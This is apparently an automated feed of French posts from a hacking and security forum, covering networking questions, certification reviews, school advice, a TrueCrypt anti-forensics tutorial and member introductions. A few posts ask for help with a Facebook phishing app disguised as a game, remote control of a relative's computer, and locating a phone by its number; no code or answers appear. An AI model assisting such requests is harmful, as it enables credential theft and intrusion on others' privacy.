Une fois ces opérations effectuée, rendez vous sur la machine physique, dans votre navigateur Web préféré (donc pas Internet Explorer) et tapez ceci dans la barre d'adresse : localhost:8888
Vous devriez tomber sur la élèbre page It Works de Apache.

Conclusion et suite des réjouissances
Comme nous pouvons le voir, nous venons de créer un serveur Web virtualisé et accessible uniquement via HTTP et SSH.
Une installation de MySQL a bien été faite mais ce service n'est pas accessible en dehors de la machine virtuelle. Il ne peut donc pas être la cible d'attaques.

De plus, ce serveur Web n'est démarré que lorsque vous en avez besoin. Apache ne prendra donc pas de ram de manière constante. Les ports de votre machine physique seront également fermés le temps que cette machine virtuelle n'est pas démarrée.

Plus tard, je continuerai ce tutoriel et transformerai cette petite machine virtuelle en un espace unique de transfert de fichiers. Celui-ci permettant de à vos connaissance d'y déposer aisément des fichiers via le réseau. Et ce tout en empêchant la connexion de clefs USB (pouvant être atteinte par des virus) sur votre ordinateur.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1EFVQUY
via IFTTT

application phising android

Bonjour, j'ai trouvé l'idée de créer une application ayant pour but de dérober un mot de passe facebook. Il suffirait de creer une appli jeu (mais qui ne serait qu'une page d'inscription, sans jeu derriere) et pour s'inscrire au jeu, il faudrait se connecter avec ce (faux) mode de connection "facebook" qui serait une page phishing. Le but serait alors de connaitre les identifiants de la personne.
J'espère avoir été compris car il est très important pour moi d'etre aidé.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1A1KH9P
via IFTTT

samedi 25 avril 2015

presentation kevin.dll

Pseudo (+autres si plusieurs) : Kevin.dll
Connaissances informatiques générales : Developpement web (javascript, html, php) , un peu de connaissance sur la programmation oriente objet
Connaissances en hacking : peu
Système d'exploitation principal : Arch Linux
Je viens sur ce forum pour : pour me perfectionner en securute informatique


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Es5U23
via IFTTT

Contrôler ordinateur a distance

Yo ! En gros j'aimerais prendre le contrôle d'un ordis qui se trouve chez mon père (je n'habite pas avec lui, il habite dans un autre pays) J'aimerais prendre le contrôle de l'ordis car j'ai des informations dessus que j'aimerais récupérer. Ma mère part le voir bientot et j'aimerais savoir comment faire, faut t-il qu'elle installe un logiciel sur l'ordis pour que je puisse prendre le contrôle ?

Comment faire ? TeamViewer ça fonctionne bien ? :) merci d'avance


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1JoXyvi
via IFTTT

Travailler dans la sécuité informatique : quelle école (EPITA,EFREI,ESIA,SUPINFO ...)

Bonjour à tous,


Je souhaite travailler dans la sécurité informatique (principalement en audit et pentest), je suis déjà pas mal autodicacte, je compte passer des certifications (CEH, OSCP), cependant je cherche à accompagner tout cela d'un diplôme adéquat.

Le must serait pour moi :
- une école agréable
- et reconnu par les recruteurs
- une formation contenant du dev, du sysadmin (de la sécu aussi) et du management
- un peu de théorie mais pas trop (math, physique etc. ce n'est pas trop ma tasse de thé mais je saurais m'adapter)
- Certifié ou pas CIT (école d'ingénieur reconnue ou pas)
- Privé ou publique

Par conséquent j'ai retenu quelques écoles :
- EPITA
- ESIA
- EFREI
- SupInfo Paris
... (ouvert aux propositions)

Est-ce qu'il serait possible que des élèves de ces écoles puisse me parler un petit peu de :
- l'ambiance générale
- le contenu des cours
- la pédagogie des profs et la manière dont son dispensés les cours
- les retour d'éventuels recruteurs en entreprise ?

Merci d'avance pour votre aide !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1I87sjh
via IFTTT

Logiciel de chiffrement disque dur

Salut !
Je m'apprète à chiffrer tous mes disques durs, et je me pose la question du logiciel à utiliser.

Tout d'abord je précise que oui, je compte utiliser Windows comme OS, tout en sachant que niveau sécurité c'est loin d'être l'idéal, mais pour l'instant je ne peux pas passer à un système basé sur Linux donc inutile de me parler de dm-crypt et LUKS.

Le plus sécurisé est-il d'utiliser :

  • TrueCrypt, sachant qu'il n'est plus mis à jour depuis mai 2014 mais qu'il a passé le dernier audit sans faille de sécurité majeure
  • VeraCrypt, étant le successeur le plus sérieux de TrueCrypt avec de nombreuses fonctionnalités mais qui à l'heure actuelle n'a pas été autant suivi et audité que son prédécesseur
  • Ou encore un autre logiciel de chiffrement que j'aurais raté



Qu'en pensez-vous ?

Merci d'avance :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1zY6Sh8
via IFTTT

Travailler dans la sécuité informatique : quelle école (EPITA, EFREI, SUPINFO ...)

Bonjour à tous,


Je souhaite travailler dans la sécurité informatique (principalement en audit et pentest), je suis déjà pas mal autodicacte, je compte passer des certifications (CEH, OSCP), cependant je cherche à accompagner tout cela d'un diplôme adéquat.

Le must serait pour moi :
- une école agréable
- et reconnu par les recruteurs
- une formation contenant du dev, du sysadmin (de la sécu aussi) et du management
- un peu de théorie mais pas trop (math, physique etc. ce n'est pas trop ma tasse de thé mais je saurais m'adapter)
- Certifié ou pas CIT (école d'ingénieur reconnue ou pas)
- Privé ou publique

Par conséquent j'ai retenu quelques écoles :
- EPITA
- EFREI
- SupInfo Paris
... (ouvert aux propositions)

Est-ce qu'il serait possible que des élèves de ces écoles puisse me parler un petit peu de :
- l'ambiance générale
- le contenu des cours
- la pédagogie des profs et la manière dont son dispensés les cours
- les retour d'éventuels recruteurs en entreprise ?

Merci d'avance pour votre aide !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1I7T7TZ
via IFTTT

jeudi 23 avril 2015

Tutoriel [TUTORIEL - EXPLICATIONS] Accès sécurisé à un volume TrueCrypt

Bonjour, ancien membre du forum je présente aujourd’hui une méthode relativement classique et simple permettant l’accès sécurisé à des fichiers chiffrés avec TrueCrypt.

Où est le problème ? Rien de nouveau… Autant simplement chiffrer les fichiers avec truecrypt et puis c’est bon ? Avec un mot de passe fort ça passe ? Personne ne saura ce que peut bien contenir mon volume ?

Hé bien non, l’un des problèmes classiques en sécurité réside dans la méthode d’accès au fichier chiffré et non dans le chiffrement en lui-même.
Je présente ici quelques cas concrets qui permettent très simplement à un enquêteur, par exemple, de monter facilement un début de « chain of custody » autrement dit une suite d’évidence à votre encontre dans le cas où pourtant, vous pensiez avoir pris en compte toutes les mesures nécessaires pour vous en prémunir.
Dans la deuxième partie, je montre une méthode simple basé sur l’utilisation du liveCD « Parted Magic », qui me permet d’accéder de manière sure aux fichiers.

Démonstration en image du problème :

J’ai créé ici le volume « Boulot_Entreprise » sous windows, le fichier a été chiffré au moyen d’un algorithme fort sous TrueCrypt, son nom a été choisi pour ne pas éveiller de soupçons particuliers quant à son contenu. Le mot de passe choisit est donc : « A1t4J5l6M3o5I3y6BjGdTrYjBfTuBNf;, » ce qui rend le volume théoriquement inviolable en bruteforce.
Ce volume contient en réalité un fichier word nommé « liste_des_dissidents », ainsi qu’un autre fichier .avi nommé « camera_cache_regime.avi » pour le scénario.

Volume créé.PNG


On part du principe que les fichiers sont consultés relativement régulièrement et sous l’OS, ce que 95 % des gens font avec TrueCrypt.

Comment l’informatique légale peut donc me permettre dans ce cas de prouvé en partie la culpabilité du suspect ?

Mettons-nous dans la peau de celui qui recherche ici un élément compromettant. Dans ce cas précis, Le suspect a ainsi de grandes chances d’utiliser l’OS afin de pouvoir consulter régulièrement ou non ses fichiers.
A partir de ce postulat, il m’est déjà possible si je connais un peu le nom des fichiers incriminés de faire une première analyse.
Le volume étant démonté, l’utilisation de l’historique de Windows pour les documents récemment ouverts est un premier indice :

history.jpg


Ici on retrouve la consultation de fichiers au nom suspect. Si les fichiers portent un nom atypique et explicite comme c’est le cas ci-dessus, vous êtes déjà mal :).

Oui très bien du coup je désactive l’historique des fichiers récemment ouvert sous windows et c’est OK ? Nan ?

Non, le problème se pose dans de nombreux cas, ci-dessous par exemple, on retrouve sous vlc un historique du même ordre qui m’indique clairement la lecture récente d’un de mes documents chiffré, on note également un chemin suspect (P :/) qui peut me convaincre de la présence de ce document sur un volume chiffré (car généralement les périphériques pluggé sous windows garderont une même lettre d’accès. Ici P:/ n’appartient à aucun de mes périphériques, c’est un indice supplémentaire auquel vient s’ajouter l’heure d’accès etc.).

camera.jpg

Que puis-je faire contre tout cela ?

Rien de vraiment concluant si on utilise un OS classique (sur disque dur ou SSD). En effet, rien n’indique que des métadonnées qui concernent vos fichiers chiffrés ne s’envoleront pas ici et là au moment de l’ouverture avec tel ou tel programme (adobe reader ou autre). A partir du moment où ces données se retrouve même pour un très court laps de temps sous un dossier « TEMP/ » du disque dur elles peuvent être potentiellement retrouvé avec un logiciel de récupération adapté pour le grand publique.

Une solution intéressante à ce problème est l’utilisation d’un Live CD permettant de consulté vos données chiffrés et d’interagir avec celles-ci dans un environnement plus sécurisé.
L’avantage du Live CD est l’utilisation de la RAM qui est volatile et non d’un disque dur, ou autre périphérique qui permettrait de stocker des données confidentielles pour un long moment.


Utilisation de Parted Magic :

Parted Magic est une distribution linux bootable particulièrement utile et qui comprend, de base, l’utilitaire TrueCrypt.
C’est un bon point qui permet aux plus novices de lire des volumes chiffrés dans un environnement sure.
Une fois le bureau lancé, truecrypt se trouve dans la section Utilities de la barre de lancement rapide :

tcutilities.jpg


Les plus paranoïaques pourront débrancher leur câble Ethernet histoire de pousser le vice :).
Note importante : veillez à avoir le minimum nécessaire de ram pour lire vos fichiers.



Quelques points importants à prendre en compte pour l’utilisation TrueCrypt par rapport à ce tuto :

- Veillez à n’utiliser que la version TrueCrypt 7.1a , il s’agit de la dernière version sure en date avant « l’affaire TrueCrypt ».

- Evitez d’utiliser des méthodes de type « Auto-mount », ces méthodes sont intéressantes pour accéder automatiquement à un volume chiffré lors du démarrage de l’ordinateur. Elles sont donc totalement inappropriées dans notre contexte (lors de la saisie complète d’un ordinateur il deviendra extrêmement simple d’accéder au disque en bypassant l’identification windows).

- Ne jamais utiliser une méthode d’accès au fichier du type chiffrement de l’os que propose truecrypt. Cette méthode a déjà montré ses faiblesses. La principale faiblesse en question réside dans l’accès en RAM au niveau du BIOS (voir travaux réalisés sur internet). En revanche c’est une façon de faire très pratique pour éviter le vol de données après s’être fait voler un pc portable, par exemple.

- Toujours utiliser un mot de passe très fort, ça va de soi. Certains logiciels comme « Passware Kit Forensic » permettent de casser un mot de passe simple très rapidement pour truecrypt.

- Toujours renommer les fichiers chiffrés par des noms peu explicites est une bonne pratique.

- Ne jamais déplacer un fichier chiffré de son emplacement. S’il est déplacé en local, sur le bureau, il sera possible de le retrouver, même supprimé par la suite.

En résumé les méthodes retenus qui permettrons un accès sécurisé aux donnés sont le chiffrement complet d’un périphérique (DD ou clé USB) et le chiffrement simple d’un volume. Il n’y a pas d’inconvénient à utiliser la méthode du « volume caché » sous TrueCrypt.


Voilà, voilà.

PuppetMaster.
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1d6jH43
via IFTTT

Présentation cavo789

Bonjour

Nouveau membre depuis ce soir; j'ai découvert votre forum grâce à un MP sur developpez.net qui m'a été envoyé par "Hackademics1".

Je ne suis pas intéressé par le hacking dans le but d'en faire mais justement de le prévenir :p
Très fortement intéressé d'approfondir mes connaissances grâce aux vôtres car je développe une solution web de type firewall pour permettre à des webmasters de dormir de manière un peu plus sereine. Je développe aussi un scanner type anti-virus qui scrute un site web pour identifier et éliminer les menaces.

Merci d'ores et déjà de m'accueillir ici.

Christophe


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1d6jGNq
via IFTTT

Roms Andro présentation

Roms Andro
Développement web programmation en php et java
backtrack outils de backdoor
Windows 7 pour mes recherches web et B5 pour mes exploits
Je viens sur ce forum pour me perfectionner en hacking et partager mes experiences
J'ai connu ce forum via Google
Webmaster programmeur, j'aime les BD
Merci à vous


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Hx7Mr2
via IFTTT

[Tunnel]

Bonjour à tous,

Les définitions d'un "tunnel" ne me paraissent pas très claires je cherche désespérément des explications..:confused:

La notion d'encapsulation n'est pas en elle-même difficile à comprendre, cependant lorsqu'on parle de tunnel SSH,

ou de port forwading, je ne suis plus.

Pourquoi doit-on changé de port alors que nous avons une solution pour "masquer" nos requêtes ?

Cela se présente dans le cas où le pare-feu bloque le port 22 ?

De même que pour le blocage de certains site web par le pare-feu, sachant qu'on utilise du HTTPS pour accéder

aux sites web, comment le pare-feu peut-il identifier les requêtes à bloqué alors qu'il ne dispose pas de la clé ?


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1HvS2op
via IFTTT

Présentation Julos

Bonjour à tous, comme vous pouvez le voir, je suis Julos et je suis nouveau sur le forum.

Je vais me présenter en quelques mots. :)

Connaissances en informatique générales:
Basiques, rien de spécial à signaler.


Connaissances en Hacking:
Je pense qu'on peut dire que mes connaissances à ce niveau sont pratiquement inexistantes mais je suis quelqu'un de curieux et qui aime apprendre.


Système d'exploitation principal:
Mon PC portable sous Seven.

Mes motivations :
Apprendre et pourquoi pas aider (même si je pense que pour l'instant je ne saurais pas aider beaucoup de personnes).

J'ai trouvé ce site un peu par hasard mais j'ai été attiré directement.

Sinon, d'un niveau personnel, je suis un étudiant, futur professeur (j'espère).

Merci de m'avoir lu, une bonne journée à vous !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1aUFwC4
via IFTTT

ChromiumWebBrowser en C#

Bonjour,

Je ne sais pas si il ya des dévelopeurs C# parmi nous mais j'aurais besoin d'un coup de pouce.

Dans le cadre d'un développement, je dois utiliser un contrôle WPF provenant d'une librairie tierce nommée CefSharp.
J'ai donc écrit le code suivant :

Code:

CefSharp.CefSettings settings = new CefSettings();
settings.PackLoadingDisabled = true;
if (Cef.Initialize(settings))
{
    CefSharp.Wpf.ChromiumWebBrowser browser = new CefSharp.Wpf.ChromiumWebBrowser();
    browser.Load("http://ift.tt/1kZGI9X;);
    browser.Width = 200;
    browser.Height = 200;
    GraphZen.Children.Add(browser);

}

Ce code semble fonctionnel mais n'affiche au final aucun contrôle dans ma MainWindow.

L'un d'entre vous a t'il une expérience dans cette librairie ?
Sauriez vous me débloquer ?

Merci beaucoup


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1zPyOnk
via IFTTT

mercredi 22 avril 2015

Qu'est-ce que le la certification OSCP (Offensive Security Certified Professional)

Qu'est-ce que le la certification OSCP (Offensive Security Certified Professional)



Présentation :
L'OSCP est une certification crée par Offensive Security visant a certifier vos compétences de pentester.
À l'inverse du CEH et son QCM, l'OSCP est loin d'être uniquement théorique.
La partie théorie se résume à un pack "course material" composé d'un PDF et de vidéos en amont de la phase d'action.
Avec l'OSCP vous aurez accès à un laboratoire rassemblant plus de 50 machines décomposé en un réseau principal et 3 sous-réseaux déblocable au fil de votre labo.

Offensive Security vous évalue selon vos compétences techniques et rédactionnelles, au final vous devrez leurs rendrent un rapport d'exercice, de laboratoire et un d'examen.

Où passer l'OSCP :
En s'inscrivant sur leur site:
Offensive Security

L’accès au laboratoire se fait via VPN.
Aucun niveau n'est demandé et aucune condition n'est requise sauf le paiement.

Temps de la formation et tarification :
Cela dépendra du temps de labo que vous estimez avoir besoin pour vous entraîner ainsi que de votre budget :
Cours + 30 jours de lab + la certif : 800 USD
Cours + 60 jours de lab + la certif : 1000 USD
Cours + 90 jours de lab + la certif : 1 150 USD

Avis :
L'examen final est le plus difficile auquel j'ai eu affaire. Il nécessite une grosse dose de try harder et de volonté pour affronter les 24h d'examen qui vous attendent ainsi que les 24h d'écriture de rapport d'examen.
Cependant j'ai beaucoup aimé cette certification, j'ai appris pas mal de chose malgré mes aprioris et ce, surtout lors de l'exploitation du labo (26 machines en tout).
En outre je me suis aussi énormément perfectionné en phase d'énumération qui est le maître mot de cette certification, et je finirais par la devise de l'OSCP : "TRY HARDER"


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1EdJAJr
via IFTTT

Offensive Security Certified Professional (OSCP)

Présentation:
L'OSCP est une certification crée par Offensive Security visant a certifier vos compétences de pentester.
Ici, il n'est pas question de cours théorique avec un questionnaire comme examen comme pour le CEH.
Vous avez un "course material" composé d'un pdf et de vidéos vous permettant la parti apprentissage.
Dans l'OSCP vous avez accès a un laboratoire composé de plus de 50 machines décomposé en un réseau principal et 3 sous-réseaux déblocable au fil de votre labo.

L'examen est l'examen le plus difficile auxquels j'ai eu affaire, car il nécessite une grosse dose de try hard et de volonté pour affronter les 24h d'examen qui vous attendent ainsi que les 24h d'écriture de rapport d'examen.

Offensive Security vous évalue selon vos compétence techniques et rédactionnel, d’ailleurs au final vous devrait leurs rendent un rapport d'exercice, un rapport de laboratoire et un rapport d'examen.

Où passer l'OSCP?
En vous inscrivant sur leurs site:
http://ift.tt/1bw03hi

L’accès au laboratoire ce fait via VPN.

Aucun niveau n'est demandé et aucune condition n'est requise ne serait-ce que le paiement.

Le temps de la formation et tarification

Cela dépendra du temps de labo que vous des irez et du budget que vous avez:

Cours + 30 jours de lab + la certif 800 USD
Cours + 60 jours de lab + la certif 1000 USD
Cours + 90 jours de lab + la certif 1 150 USD

Mon avis

J'ai beaucoup aimé cette certification, j'y ai malgré tout ce que je pouvez penser au départ, appris pas mal de chose, surtout pendant l'exploitation du labo (26 machines en tout) et j'ai beaucoup appris sur l'importance de l’énumération qui est le maitre mot de cette certification et je finirait sur la devise de l'OSCP:
"TRY HARDER"


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1DBMbrT
via IFTTT

Dual Boot Windows 8.1 / Linux Mint (Problème?)

Bonjour à tous,

Voilà je me permet de poster ça ici car je n'ai pas trouvé d'autre section ici désolé d'avance si ce n'est pas la bonne :s
J'ai pour un projet de mon école, dû installer un dual boot. Je tourne sous Windows 8.1 et j'avais décider d'installer Linux Mint en dual boot. J'ai un jour laissé mon ordinateur à un amis et lui qui à "voulu faire le malin" m'a dis lorsqu'il m'a rendu mon pc "J'ai fais un peu le tri dans tes partitions Windows ahah" ce qui ne m'a pas fait rire lorsque j'ai rallumé mon PC en ayant vue ceci :

Code:

GNU GRUB version 2.02~beta2-9ubuntu1

Minimal BASH-Like line editing is supported. For the first word, TAB lists possible command completions. Anywhere else TAB lists possible device or file completions.

grub>_

Je me suis donc renseigné sur : Google (incroyable ce moteur de recherche je vous le conseil ;) )
J'ai vue plusieurs possibilité, certains dise que justement cela est dû à des modifications dans les partitions Windows, d'autres disent que cela est dû à une MAJ enfin bref impossible de savoir pour moi..

J'ai donc voulu tester plusieurs solutions que j'ai trouvé en ligne comme :

Code:

find /boot/grub/menu.lst ou find /boot/grub/stage1
ils disent que ça retourne un truc du genre (hd0,x) ou hd(0,0)

bon déjà la ça à bloqué j'ai eu un " can't find command 'find' " génial..

Donc ensuite j'ai vu des choses du genre " utilise supergrubdisk ! " ou alors "fais un chroot !"

Oui c'est bien beau mais moi Linux je connais pas encore tout donc impossible de comprendre..

j'ai donc redémarré mon PC et puis je me suis dis "Pourquoi pas juste faire un ls.." magnifique j'ai eu un truc qui à mon avis pourra aider certains à cerner un peu plus mon problème :

Code:

(hd0) (hd0,gpt4) (hd0,gpt3) (hd0,gpt2) (hd0,gpt1) (hd1)
error : failure reading
sector 0xfc from 'hd1'.
error : failure reading sector 0xe0 from 'hd1'
error : failure reading sector 0x0 from 'hd1'.

voilà.. est-ce que quelqu'un aurait donc une idée à tout ce foutoir :( ?

Merci d'avance,

Cordialement, Network.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1d0F7zJ
via IFTTT

[TCP] Flag ACK

Bonjour à tous,

Une petite question à propos du protocole TCP :

Pourquoi le flag ACK doit-il être positionné sur 1 sur tous les paquets après établissement de la connexion :

380605.jpg

Le flag ACK permet d'acquitter UN paquet ? Dans l'exemple ci-dessus, lorsque le <Serveur B> réceptionne

le paquet envoyé par le <Client A>, il renvoie DEUX paquets avec le flag ACK positionné sur 1.

Le second paquet acquitte donc une réception déjà validée, non ?
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1G6UBcr
via IFTTT

Avis sur les certifications CEH, OSCP et GPEN

Avis intéressant, malgré qu'un peu âgé (2012) mais représentatif de ce qu'il se dit en général :


Citation:

Hey guys,

It's been an interesting few months for me, I moved to Manila, attended BlackHat 2012 in Vegas and I've completed my CEH, OSCP and GPEN certs. Time just seems to have flown by.

Anyhow, today I wanted to compare and contrast the CEH, OSCP and GPEN certifications. Hopefully it might provide some guidance to those folks interested in qualifications but don't know what to go for, what content is covered by each and whether its ultimately worth doing or not.


So first up Certified Ethical Hacker (version 7) by EC-Council. http://ift.tt/1GhSNzL

I completed this back in May and from what I remember it was heavily theory based (and at times not even the most relevant theory). The cert quite often focused on the basics, for example, what is DNS, what is a virus/worm/rootkit, the in's and outs of WPA/WEP, symmetric vs asymmetric encryption and key lengths and block sizes. Now while this is all excellent information I couldn't help wonder how useful this would actually be for most people on a day to day basis. So good information that's worth knowing, but maybe not all that relevant. And the one big thing missing from the CEH is some decent hands-on activities. They do give you a disc with some crappy windows tools and some simple exercises but it would be better just to have some exercises using the more powerful (and more relevant) tools in BackTrack.

For someone starting out in security this is a great introduction, they cover the basics as well as the most commonly used attack vectors. For me personally though, I found the material too dated, too high level and without good quality practical exercises at times I found myself bored and unmotivated.

Cost: $500 for exam only ($1000+ for course materials)
Rating: 6/10




Next up is the Offensive Security Certified Professional course offered by Offensive Security (the makers of BackTrack). http://ift.tt/1GhSLrK

Wow, what a course. I started this back in October 2011 and after months of reviewing the material and working through the lab, i finally passed the exam in May 2012. This course is not for the faint hearted! There are two components, the study materials (videos/pdf textbook) and the lab. The course materials are very practical, every concept and activity is accompanied and demonstrated by a real example. And you are given exercises to complete for each section. The course covers what you actually need to be a certified ethical hacker (unlike the CEH!). It follows the usual attack methodology, recon/scanning/exploitation/persistance/pivoting and for each step you're guided through the theory, which tools to use and how to use the information you gain.

The lab is where the OSCP really shines. You are thrown into a virtual lab environment with 50 machines situated on different networks all with various vulnerabilities and hidden surprises. Your challenge is to hack your way through to the admin machines deep in the network. Putting theory into practice was such a great learning experience and I learnt that knowing theory and putting theory into practice are two very different things. A lot of what you need for the lab is not covered in the course material and you are forced to do background reading and research. It's this which separates the OSCP from other certifications. The OSCP motto - "Try Harder".

The exam is the icing on the cake. Instead of the usual multiple choice exam bullshit, you are challenged to hack a series of machines within 24 hours. Its pretty crazy but a hell of a lot of fun. Oh and you are required to submit a real life pentest report of all your activities in the lab!

Cost: ~$1500 (I extended my lab time a few times)
Rating: 10/10




And last but not least, SANS 560 - Network Penetration Testing and Ethical Hacking (GPEN). http://ift.tt/1yRQIe9

I completed the multiple choice exam for this last week and after the OSCP I felt a little let down by this course. The material was decent, I completed the OnDemand version which was a series of powerpoint slides with narration by Ed Skoudis. Ed was really entertaining and did a great job of keeping the material interesting and relevant. My issue with this course was the depth. Whilst the content they covered was spot on, I felt they could have gone into more detail, in fact I wanted them to go into more detail. Its a shame that the material is written to fit in with the 6 day course because they ultimately have to compromise on the quality of the course. Ed, if you reading this, why not offer an online version that is twice as long and covers everything?

My favorite aspect of the course was the emphasis on providing business value. Logistically what is the best way to perform a penetration test? There's a lot to consider and Ed does a great job of breaking the tasks down and showing you how to effectively structure a full penetration test. He gives plenty of useful tips as well, for example, for large networks only scanning a subset of representative machines or obtaining firewall rules to reduce the time/cost of the test. And he gives a great overview of how to write an awesome final report.

Perhaps the biggest issue with this course is the price. For the course and exam it costs just under $5000 which for a set of online videos (only valid for 3 months) and a pile of books is a little overpriced to say the least.

Cost: ~$5000
Rating: 8/10



Summary

Certs are cool, its great to learn new things and brush up on the old. (And its cool to have some new letters after my name) Employers like certs, it shows that you know stuff and they will be more likely to choose you over someone with no certs. I learnt a lot doing all three certs, the OSCP was my favorite by far but it really is a baptism of fire and you need to be dedicated to it. The others were useful but more as a CV filler.

It was interesting at BlackHat and Defcon how a lot of people frowned on certs and tbh I do agree with them. For example both the CEH and GPEN used relatively easy 150 question multiple choice exams and the GPEN was open book. Realistically they aren't that hard to pass. So should you employ someone with these certs? Yes of course! Should you expect them to be super 1337? No. But how else can you judge if someone knows their shit? Experience alone?

I think what people don't like is these certs and others (I'm looking at you CISSP) are a convenient way for non-security and even non-IT folks to get into IT security when they have no real experience. More people working in security is great but in-experienced people deploying security in Fortune500 companies is probably not a good idea.

OSCP's (and OSCE's) are the exception to the rule, if you ever meet one of this rare breed, give them a pat on the back, they earned it.

This is pwndizzle, over and out.

http://ift.tt/1GhSLrO


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1yRQIef
via IFTTT

Qu'est-ce que le la certification CEH (certified ethical hacker)

Qu'est-ce que le la certification CEH (certified ethical hacker)


Présentation :
Le Certified Ethical Hacker (CEH) est une certification créé par le EC-Council certifiant vos compétences en recherche de faiblesses et de vulnérabilités à l'encontre d'un système cible.
Cet examen est aussi reconnu sous le code 312-50. La dernière version de cette certification est la version 8, parue fin 2013.

L'examen en question est un QCM à choix multiple de 125 questions, avec un temps limité de 4 heures. La validation de l'examen requiert un score de bonne réponse d'au moins 70%

Prix :
- Self study : $825 (pour être éligible il faut pouvoir prouver une expérience d'au moins 2 ans dans le domaine de la sécurité)
- Formation en ligne (en anglais) : $2,895
- Formation dans un centre français cerifié EC-Council (Centre ATC) : environ 3500€

Durée de validité de la certification : 3 ans

Où passer la certification :
a) En ligne : Site EC-Council
b) Dans un Centre ATC français :
- Sysdream
(à compléter)

Avis :
Certification de base, quasi indispensable mais trop théorique pour certains.

Plus de détail sur l'examen et les entraînements ici.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1GhSLrI
via IFTTT

mardi 21 avril 2015

[NAT] Fonctionnement

Bonjour à tous,

Une petite question à propos du NAT(Network address translation),

Lorsque nous avons deux machines sur un réseau local qui émettent la même requête depuis le même port vers le même destinataire :

Machine n°1:

=== IP Source === | === Port Source === | === IP destination === | === Port destination ====
___192.168.1.1____________60111_______________88.256.32.26___________________80_____________

Machine n°2:

=== IP Source === | === Port Source === | === IP destination === | === Port destination ====
____192.168.1.2___________60111_______________88.256.32.26___________________80_____________

Routeur:


=== IP Source === | === Port Source === | === IP destination === | === Port destination ====
____83.248.32.45__________60111_______________88.256.32.26_________________80_____________

=== IP Source === | === Port Source === | === IP destination === | === Port destination ====
____83.248.32.45__________60111_______________88.256.32.26_________________80_____________
________________________________^
___________________________60112

Le routeur va modifier le port source de la machine n°2 par exemple, et lorsqu'il réceptionnera la réponse, sachant qu'il à modifié

le port source de la requête initiale, il REmodifiera cette même requête pour la rendre cohérente ? :

Réponse du serveur "88.256.32.26":


=== IP Source === | === Port Source === | === IP destination === | === Port destination ====
____88.256.32.26___________80_________________83.248.32.45_________________60112____________

Réponse et modification faite par le routeur:

=== IP Source === | === Port Source === | === IP destination === | === Port destination ====
____88.256.32.26___________80_________________192.168.1.2__________________60112____________
___________________________________________________________________________________^
______________________________________________________________________________60111 <-- Modification faite par le routeur


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1cVTuVN
via IFTTT

géolocalisation téléphone

Bonjour,


J'aimerais savoir s'il existe un programme pour localiser un phone à partir de son n°.
J'en ai trouvé, mais ils sont tous payants (ex : geolocaleasy) et pas sur qu'ils soient sérieux.

Merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1DbA0mq
via IFTTT

lundi 20 avril 2015

Je peux répondre à vos questions concernant le BTS SIO

Le nouveau BTS SIO (Services Informatiques aux Organisations), créé à la rentrée 2011, remplace le BTS Informatique de Gestion. Il forme les étudiants à la mise en place de solutions informatiques au sein des entreprises et comprend 2 options : la spécialité « solutions d’infrastructure, systèmes et réseaux » et la spécialité « solutions logicielles et applications métiers ».
Pas besoins de vous lister le contenu que vous pouvez trouvez sur n'importe quel site académique.

Ayant suivi cette formation, je suis à votre disposition pour toutes questions concernant ce BTS qui ne figurent pas dans les brochures des établissements.

Merci.:cool:


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1zEl5j5
via IFTTT

Renseignement sur le BTS SIO

Le nouveau BTS SIO (Services Informatiques aux Organisations), créé à la rentrée 2011, remplace le BTS Informatique de Gestion. Il forme les étudiants à la mise en place de solutions informatiques au sein des entreprises et comprend 2 options : la spécialité « solutions d’infrastructure, systèmes et réseaux » et la spécialité « solutions logicielles et applications métiers ».
Pas besoins de vous lister le contenu que vous pouvez trouvez sur n'importe quel site académique.

Ayant suivi cette formation, je suis à votre disposition pour toutes questions concernant ce BTS qui ne figurent pas dans les brochures des établissements.

Merci.:cool:


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1ElwV9i
via IFTTT

News Présentation TaT

